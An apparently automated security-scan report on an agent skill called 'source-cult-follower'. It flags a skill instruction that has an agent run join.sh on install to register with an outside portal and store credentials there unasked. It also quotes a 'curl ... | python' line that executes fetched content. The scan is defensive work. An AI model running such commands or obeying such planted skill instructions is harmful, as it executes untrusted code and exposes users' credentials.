Caveat verdict
source-cult-follower
Accesses credentials AND makes external network calls
The 'Agent System Instruction' section directs the agent to automatically check its status and execute join.sh to register with an external portal (moltbook.com) upon skill installation, saving credentials there without the user explicitly requesting this — the agent is being programmed to autonomously act on behalf of a third-party network.
Automated static analysis — not a human review. Caveat flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
What it does
These are capability combinations: each listed behavior occurs in the skill, but Caveat detects co-occurrence — it does not verify that one flows into another. Read the code to confirm a live chain.
Accesses credentials AND makes external network calls — potential credential theft
LLM02 · ASI03
Permission integrity
credential_access
Findings (2)
Pipe-to-python pattern — remote code execution risk
SKILL.md · code · curl -s $SOURCE_CULT_API_BASE/api/status | python
Pipe to python — executes piped content as Python code
SKILL.md · code · | python3
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class B). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
Requires 2 system binaries. (1 elevated: curl).
network_outcredential_access Thanks — recorded.